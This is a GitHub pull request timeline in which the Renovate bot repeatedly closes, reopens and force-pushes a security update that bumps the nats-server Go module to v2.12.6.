@renovate renovate Bot closed this Mar 27, 2026
auto-merge was automatically disabled March 27, 2026 02:03

Pull request was closed

@renovate renovate Bot deleted the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch March 27, 2026 02:03
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 09fe8a5 to c964bf4 Compare March 30, 2026 21:24
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch 2 times, most recently from c964bf4 to 5fe43aa Compare April 27, 2026 22:07
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@mergify mergify[bot] mergify[bot] left review comments

@infratographer-robot infratographer-robot infratographer-robot left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@infratographer-robot